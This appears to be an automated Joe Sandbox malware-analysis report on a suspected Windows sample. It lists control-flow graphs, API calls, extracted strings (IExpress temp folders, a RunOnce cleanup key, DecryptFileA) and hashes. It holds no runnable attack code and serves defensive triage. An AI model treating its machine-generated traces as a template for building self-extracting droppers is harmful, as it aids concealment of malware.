                                control_flow_graph 332 7ff71d1d2db4-7ff71d1d2e4d call 7ff71d1d8b09 memset * 2 call 7ff71d1d5050 337 7ff71d1d2e53-7ff71d1d2e94 CreateEventA SetEvent call 7ff71d1d5050 332->337 338 7ff71d1d30a5 332->338 343 7ff71d1d2ec3-7ff71d1d2ecb 337->343 344 7ff71d1d2e96-7ff71d1d2ea0 337->344 340 7ff71d1d30aa-7ff71d1d30b9 call 7ff71d1d4dcc 338->340 345 7ff71d1d30be 340->345 348 7ff71d1d2ed5-7ff71d1d2ef0 call 7ff71d1d5050 343->348 349 7ff71d1d2ecd-7ff71d1d2ecf 343->349 346 7ff71d1d2ea2-7ff71d1d2ebe call 7ff71d1d4dcc 344->346 347 7ff71d1d30c0-7ff71d1d30e3 call 7ff71d1d8470 345->347 346->345 359 7ff71d1d2ef2-7ff71d1d2efc 348->359 360 7ff71d1d2efe-7ff71d1d2f1c CreateMutexA 348->360 349->348 352 7ff71d1d2fa3-7ff71d1d2fb3 call 7ff71d1d70a8 349->352 361 7ff71d1d2fc4-7ff71d1d2fcb 352->361 362 7ff71d1d2fb5-7ff71d1d2fbf 352->362 359->346 360->352 363 7ff71d1d2f22-7ff71d1d2f33 GetLastError 360->363 364 7ff71d1d2fcd-7ff71d1d2fd9 call 7ff71d1d204c 361->364 365 7ff71d1d2fde-7ff71d1d2ffd FindResourceExA 361->365 362->340 363->352 366 7ff71d1d2f35-7ff71d1d2f48 363->366 364->345 368 7ff71d1d3014-7ff71d1d301b 365->368 369 7ff71d1d2fff-7ff71d1d3011 LoadResource 365->369 370 7ff71d1d2f62-7ff71d1d2f7f call 7ff71d1d4dcc 366->370 371 7ff71d1d2f4a-7ff71d1d2f60 call 7ff71d1d4dcc 366->371 373 7ff71d1d301d-7ff71d1d3024 #17 368->373 374 7ff71d1d3029-7ff71d1d3030 368->374 369->368 370->352 381 7ff71d1d2f81-7ff71d1d2f9e CloseHandle 370->381 371->381 373->374 378 7ff71d1d3032-7ff71d1d3035 374->378 379 7ff71d1d303a-7ff71d1d3044 call 7ff71d1d3bf4 374->379 378->347 379->345 384 7ff71d1d3046-7ff71d1d3055 379->384 381->345 384->378 385 7ff71d1d3057-7ff71d1d3061 384->385 385->378 386 7ff71d1d3063-7ff71d1d306a 385->386 386->378 387 7ff71d1d306c-7ff71d1d3073 call 7ff71d1d12ec 386->387 387->378 390 7ff71d1d3075-7ff71d1d30a1 call 7ff71d1d7ac8 387->390 390->345 393 7ff71d1d30a3 390->393 393->378
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                • String ID: $EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$horseradish
                                • API String ID: 3100096412-2384002766
                                • Opcode ID: 7fc7f578be530f482524e13d1538833715e790512501b6b919f004c900bcfea5
                                • Instruction ID: 3d2c49273aed820f959799de504a1fa16d94a0b146b53e8a7ba97ac094f0273a
                                • Opcode Fuzzy Hash: 7fc7f578be530f482524e13d1538833715e790512501b6b919f004c900bcfea5
                                • Instruction Fuzzy Hash: 11819D31A0CE4386F720BB54B8683BAA691AF89774FD24135D90D42695EF7CE40DEF20

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 394 7ff71d1d6ca4-7ff71d1d6d10 GetCurrentDirectoryA SetCurrentDirectoryA 395 7ff71d1d6d3f-7ff71d1d6d7a GetDiskFreeSpaceA 394->395 396 7ff71d1d6d12-7ff71d1d6d3a call 7ff71d1d4dcc call 7ff71d1d7700 394->396 397 7ff71d1d6f63-7ff71d1d6fb8 memset call 7ff71d1d7700 GetLastError FormatMessageA 395->397 398 7ff71d1d6d80-7ff71d1d6da8 MulDiv 395->398 411 7ff71d1d6fe9 396->411 407 7ff71d1d6fbd-7ff71d1d6fe4 call 7ff71d1d4dcc SetCurrentDirectoryA 397->407 398->397 401 7ff71d1d6dae-7ff71d1d6de4 GetVolumeInformationA 398->401 404 7ff71d1d6e45-7ff71d1d6e68 SetCurrentDirectoryA 401->404 405 7ff71d1d6de6-7ff71d1d6e40 memset call 7ff71d1d7700 GetLastError FormatMessageA 401->405 409 7ff71d1d6e6c-7ff71d1d6e73 404->409 405->407 407->411 414 7ff71d1d6e75-7ff71d1d6e7a 409->414 415 7ff71d1d6e86-7ff71d1d6e99 409->415 417 7ff71d1d6feb-7ff71d1d701a call 7ff71d1d8470 411->417 414->415 418 7ff71d1d6e7c-7ff71d1d6e84 414->418 419 7ff71d1d6e9d-7ff71d1d6ea0 415->419 418->409 418->415 421 7ff71d1d6ea2-7ff71d1d6eac 419->421 422 7ff71d1d6eae-7ff71d1d6eb2 419->422 421->419 421->422 424 7ff71d1d6eb4-7ff71d1d6ed3 call 7ff71d1d4dcc 422->424 425 7ff71d1d6ed8-7ff71d1d6edf 422->425 424->411 426 7ff71d1d6ee1-7ff71d1d6ee9 425->426 427 7ff71d1d6f0e-7ff71d1d6f1f 425->427 426->427 430 7ff71d1d6eeb-7ff71d1d6f0c 426->430 431 7ff71d1d6f22-7ff71d1d6f2a 427->431 430->431 432 7ff71d1d6f46-7ff71d1d6f49 431->432 433 7ff71d1d6f2c-7ff71d1d6f30 431->433 435 7ff71d1d6f4f-7ff71d1d6f52 432->435 436 7ff71d1d6f4b-7ff71d1d6f4d 432->436 434 7ff71d1d6f32 433->434 437 7ff71d1d6f54-7ff71d1d6f5e 434->437 438 7ff71d1d6f34-7ff71d1d6f41 call 7ff71d1d24f8 434->438 435->434 436->434 437->417 438->417
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                • API String ID: 4237285672-388467436
                                • Opcode ID: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                • Instruction ID: 97849acd4b436c66f5ceaaec74a9103179d9ad163704bfca5dab7a4e56e7d272
                                • Opcode Fuzzy Hash: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                • Instruction Fuzzy Hash: B1A15036A0CF428AF720AB24F4686AABBA5FB89754F854535DA4D03654EF3CD409DF10

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                • String ID: *MEMCAB$CABINET
                                • API String ID: 1305606123-2642027498
                                • Opcode ID: 73d02511bd41989529bcd23ff6b0e0c8ec250e42df1f9c8d155ed0afd688ad53
                                • Instruction ID: 609d2b76187aef182e57d439d8a18d6e086fc1b7b9604161e78c2c5a2db6ccc9
                                • Opcode Fuzzy Hash: 73d02511bd41989529bcd23ff6b0e0c8ec250e42df1f9c8d155ed0afd688ad53
                                • Instruction Fuzzy Hash: 9F51DB31A0CF4386FB10AB10F8686B5E7A2FB8A765FD64135D94D46654EF7CE008EE60

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 495 7ff71d1d30ec-7ff71d1d3114 496 7ff71d1d3116-7ff71d1d311c 495->496 497 7ff71d1d3141-7ff71d1d3148 call 7ff71d1d5fe4 495->497 498 7ff71d1d3134-7ff71d1d313b call 7ff71d1d3f74 496->498 499 7ff71d1d311e call 7ff71d1d60a4 496->499 506 7ff71d1d3236 497->506 507 7ff71d1d314e-7ff71d1d3155 call 7ff71d1d66c4 497->507 498->497 498->506 504 7ff71d1d3123-7ff71d1d3125 499->504 504->506 508 7ff71d1d312b-7ff71d1d3132 504->508 510 7ff71d1d3238-7ff71d1d3258 call 7ff71d1d8470 506->510 507->506 513 7ff71d1d315b-7ff71d1d319d GetSystemDirectoryA call 7ff71d1d7ba8 LoadLibraryA 507->513 508->497 508->498 517 7ff71d1d319f-7ff71d1d31b8 GetProcAddress 513->517 518 7ff71d1d31c9-7ff71d1d31de FreeLibrary 513->518 517->518 519 7ff71d1d31ba-7ff71d1d31c3 DecryptFileA 517->519 520 7ff71d1d3273-7ff71d1d3288 SetCurrentDirectoryA 518->520 521 7ff71d1d31e4-7ff71d1d31ea 518->521 519->518 522 7ff71d1d3291-7ff71d1d3297 520->522 523 7ff71d1d328a-7ff71d1d328f 520->523 521->520 524 7ff71d1d31f0-7ff71d1d320b GetWindowsDirectoryA 521->524 526 7ff71d1d332d-7ff71d1d3335 522->526 527 7ff71d1d329d-7ff71d1d32a4 522->527 525 7ff71d1d3212-7ff71d1d3230 call 7ff71d1d4dcc call 7ff71d1d7700 523->525 528 7ff71d1d320d 524->528 529 7ff71d1d325a-7ff71d1d326a call 7ff71d1d6ca4 524->529 525->506 531 7ff71d1d3337-7ff71d1d3339 526->531 532 7ff71d1d3349 526->532 533 7ff71d1d32a9-7ff71d1d32b7 527->533 528->525 535 7ff71d1d326f-7ff71d1d3271 529->535 531->532 536 7ff71d1d333b-7ff71d1d3342 call 7ff71d1d2318 531->536 539 7ff71d1d334b-7ff71d1d3359 532->539 533->533 537 7ff71d1d32b9-7ff71d1d32c0 533->537 535->506 535->520 548 7ff71d1d3347 536->548 541 7ff71d1d32c2-7ff71d1d32c9 537->541 542 7ff71d1d32fb call 7ff71d1d5d90 537->542 544 7ff71d1d3376-7ff71d1d337d 539->544 545 7ff71d1d335b-7ff71d1d3361 539->545 541->542 549 7ff71d1d32cb-7ff71d1d32f9 call 7ff71d1d7ac8 541->549 555 7ff71d1d3300 542->555 546 7ff71d1d337f-7ff71d1d3381 544->546 547 7ff71d1d3388-7ff71d1d338d 544->547 545->544 552 7ff71d1d3363 call 7ff71d1d40c4 545->552 546->547 553 7ff71d1d3383 call 7ff71d1d494c 546->553 547->510 548->539 559 7ff71d1d3302 549->559 560 7ff71d1d3368-7ff71d1d336a 552->560 553->547 555->559 561 7ff71d1d3313-7ff71d1d3321 call 7ff71d1d772c 559->561 562 7ff71d1d3304-7ff71d1d330e 559->562 560->506 563 7ff71d1d3370 560->563 561->506 566 7ff71d1d3327 561->566 562->506 563->544 566->526
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                • API String ID: 3010855178-2712585282
                                • Opcode ID: d024e3d04dc16d6ff208cbe559824f9b5939ede8501c72ce14a45a05cbc0e3f3
                                • Instruction ID: 2423fbae9fd900dfc7a51d9e78c8354a19ae3c89690100f74f79d3688ef80123
                                • Opcode Fuzzy Hash: d024e3d04dc16d6ff208cbe559824f9b5939ede8501c72ce14a45a05cbc0e3f3
                                • Instruction Fuzzy Hash: 4E715C30E0CE4386FA60BB15B968275E6A5AF85760FC24135D94D42295FF6CE40CEE60

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 567 7ff71d1d64e4-7ff71d1d6510 568 7ff71d1d6516-7ff71d1d651b call 7ff71d1d63b8 567->568 569 7ff71d1d65df-7ff71d1d65ee 567->569 572 7ff71d1d6520-7ff71d1d6522 568->572 571 7ff71d1d65f1-7ff71d1d65fb 569->571 573 7ff71d1d6610-7ff71d1d661b 571->573 574 7ff71d1d65fd-7ff71d1d6603 571->574 575 7ff71d1d6688-7ff71d1d668a 572->575 576 7ff71d1d6528-7ff71d1d653e 572->576 578 7ff71d1d661e-7ff71d1d6628 call 7ff71d1d6b70 573->578 574->573 577 7ff71d1d6605-7ff71d1d660e 574->577 580 7ff71d1d6698-7ff71d1d66bc call 7ff71d1d8470 575->580 579 7ff71d1d6541-7ff71d1d654b 576->579 577->571 577->573 590 7ff71d1d6649-7ff71d1d664b 578->590 591 7ff71d1d662a-7ff71d1d663d CreateDirectoryA 578->591 582 7ff71d1d6560-7ff71d1d6575 579->582 583 7ff71d1d654d-7ff71d1d6553 579->583 587 7ff71d1d65cc-7ff71d1d65dd call 7ff71d1d7ba8 582->587 588 7ff71d1d6577-7ff71d1d658f GetSystemInfo 582->588 583->582 586 7ff71d1d6555-7ff71d1d655e 583->586 586->579 586->582 587->578 593 7ff71d1d6591-7ff71d1d6594 588->593 594 7ff71d1d65bb 588->594 597 7ff71d1d668c-7ff71d1d6693 590->597 598 7ff71d1d664d-7ff71d1d6655 call 7ff71d1d6ca4 590->598 595 7ff71d1d663f 591->595 596 7ff71d1d667d-7ff71d1d6682 call 7ff71d1d7700 591->596 602 7ff71d1d6596-7ff71d1d6599 593->602 603 7ff71d1d65b2-7ff71d1d65b9 593->603 604 7ff71d1d65c2-7ff71d1d65c7 call 7ff71d1d7ba8 594->604 595->590 596->575 597->580 606 7ff71d1d665a-7ff71d1d665c 598->606 608 7ff71d1d659b-7ff71d1d659e 602->608 609 7ff71d1d65a9-7ff71d1d65b0 602->609 603->604 604->587 606->597 610 7ff71d1d665e-7ff71d1d6664 606->610 608->587 611 7ff71d1d65a0-7ff71d1d65a7 608->611 609->604 610->575 612 7ff71d1d6666-7ff71d1d667b RemoveDirectoryA 610->612 611->604 612->575
                                APIs
                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF71D1D2CE1), ref: 00007FF71D1D657C
                                • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF71D1D2CE1), ref: 00007FF71D1D662F
                                • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF71D1D2CE1), ref: 00007FF71D1D666F
                                  • Part of subcall function 00007FF71D1D63B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF71D1D2CE1), ref: 00007FF71D1D6423
                                  • Part of subcall function 00007FF71D1D63B8: GetFileAttributesA.KERNELBASE ref: 00007FF71D1D6432
                                  • Part of subcall function 00007FF71D1D63B8: GetTempFileNameA.KERNEL32 ref: 00007FF71D1D645B
                                  • Part of subcall function 00007FF71D1D63B8: DeleteFileA.KERNEL32 ref: 00007FF71D1D6473
                                  • Part of subcall function 00007FF71D1D63B8: CreateDirectoryA.KERNEL32 ref: 00007FF71D1D6484
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                • API String ID: 1979080616-1143122538
                                • Opcode ID: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                • Instruction ID: e1cd51a3b05a5c51df1afeaf70c64f3cedcfb38873b78776de6e2e1466c35ff5
                                • Opcode Fuzzy Hash: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                • Instruction Fuzzy Hash: 25519861A0CF4781FA14AB15B8382B5E3A1AF457A0FDA4935C94D03295FF7CE40CEE60

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                • String ID:
                                • API String ID: 3183975587-3916222277
                                • Opcode ID: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
                                • Instruction ID: 738bc73172cc57d06d8c35dde21fdac4ca285548e62d4ebe1814f42352caea4e
                                • Opcode Fuzzy Hash: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
                                • Instruction Fuzzy Hash: F7515E32A4CE8286F760AB54F4683B9F7A1FB887A4F924235D54D426A4EF7CD448DF10

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                • String ID: @$HeapSetInformation$Kernel32.dll
                                • API String ID: 1302179841-1204263913
                                • Opcode ID: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                • Instruction ID: b0414d7944eebc74fba3bd04921e26cdcc8d93fd5cbfcd4c459727de5425ddef
                                • Opcode Fuzzy Hash: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                • Instruction Fuzzy Hash: BD313231A0DE4386FB60BB20B4A82B5F6A1AF59770FD64135D91D03295FF7CE448AE60
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                • String ID:
                                • API String ID: 836429354-0
                                • Opcode ID: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                • Instruction ID: 425210e76a3001867562a1dcee13d6322d506e038d13d003229b5ef678848644
                                • Opcode Fuzzy Hash: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                • Instruction Fuzzy Hash: 57519F7160CE8295FB11AF20E8682E9B7A2FB45BA4FC58171DA1E03695EF3CD50DDB10

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                • API String ID: 3049360512-2186971993
                                • Opcode ID: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                • Instruction ID: 4684f2ae3c2e284e1d64896915836883d71d2e087a82c77e401ea0c270f3e3e5
                                • Opcode Fuzzy Hash: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                • Instruction Fuzzy Hash: 02513E21A0CE8796FB10AB14F8683B9B7A1FB59764FC64531D94D02694EF3CE40CEB20

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: OpenQuery$CloseInfoValue
                                • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                • API String ID: 2209512893-559176071
                                • Opcode ID: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                • Instruction ID: 83d866850f3ee40433abd26d6c595382caa989277d9d8fb79f90c13f72ef9136
                                • Opcode Fuzzy Hash: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                • Instruction Fuzzy Hash: 3B31AE32A0CF42CAE7109F20F8A46A9F7A5FB89764F854534EA9D03B54EF38D058DB10

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                • String ID: IXP$IXP%03d.TMP
                                • API String ID: 1082909758-3932986939
                                • Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                • Instruction ID: 86fba61756f424a6c2873bb1a7471b3538f4d3fab453b620ee575ce957dfc02c
                                • Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                • Instruction Fuzzy Hash: D8215031A0CD4286FA10AB12B9683B9E652FB8DBA1FC68130DD4E43795EF3CD44DDA10

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 701 7ff71d1d8200-7ff71d1d8249 call 7ff71d1d8964 GetStartupInfoW 705 7ff71d1d824b-7ff71d1d8256 701->705 706 7ff71d1d8262-7ff71d1d826b 705->706 707 7ff71d1d8258-7ff71d1d825b 705->707 710 7ff71d1d8284-7ff71d1d828c 706->710 711 7ff71d1d826d-7ff71d1d8275 _amsg_exit 706->711 708 7ff71d1d825d 707->708 709 7ff71d1d8277-7ff71d1d8282 Sleep 707->709 708->706 709->705 713 7ff71d1d828e-7ff71d1d82ab 710->713 714 7ff71d1d82e7 710->714 712 7ff71d1d82f1-7ff71d1d82fa 711->712 715 7ff71d1d82fc-7ff71d1d830f _initterm 712->715 716 7ff71d1d8319-7ff71d1d831b 712->716 717 7ff71d1d82af-7ff71d1d82b2 713->717 714->712 715->716 718 7ff71d1d8326-7ff71d1d832e 716->718 719 7ff71d1d831d-7ff71d1d831f 716->719 720 7ff71d1d82b4-7ff71d1d82b6 717->720 721 7ff71d1d82d9-7ff71d1d82db 717->721 723 7ff71d1d8330-7ff71d1d833e call 7ff71d1d88d0 718->723 724 7ff71d1d835a-7ff71d1d8369 718->724 719->718 722 7ff71d1d82dd-7ff71d1d82e2 720->722 725 7ff71d1d82b8-7ff71d1d82bc 720->725 721->712 721->722 726 7ff71d1d8444-7ff71d1d8459 722->726 723->724 738 7ff71d1d8340-7ff71d1d8350 723->738 730 7ff71d1d836d-7ff71d1d8373 724->730 728 7ff71d1d82ce-7ff71d1d82d7 725->728 729 7ff71d1d82be-7ff71d1d82ca 725->729 728->717 729->728 731 7ff71d1d83e6-7ff71d1d83e9 730->731 732 7ff71d1d8375-7ff71d1d8377 730->732 736 7ff71d1d83eb-7ff71d1d83f4 731->736 737 7ff71d1d83f8-7ff71d1d8400 _ismbblead 731->737 734 7ff71d1d837d-7ff71d1d8382 732->734 735 7ff71d1d8379-7ff71d1d837b 732->735 740 7ff71d1d8384-7ff71d1d838e 734->740 741 7ff71d1d8390-7ff71d1d83c5 call 7ff71d1d2c54 734->741 735->731 735->734 736->737 742 7ff71d1d8402-7ff71d1d8405 737->742 743 7ff71d1d840a-7ff71d1d8412 737->743 738->724 740->734 746 7ff71d1d83cf-7ff71d1d83d6 741->746 747 7ff71d1d83c7-7ff71d1d83c9 exit 741->747 742->743 743->726 743->730 748 7ff71d1d83e4 746->748 749 7ff71d1d83d8-7ff71d1d83de _cexit 746->749 747->746 748->726 749->748
                                APIs
                                Memory Dump Source
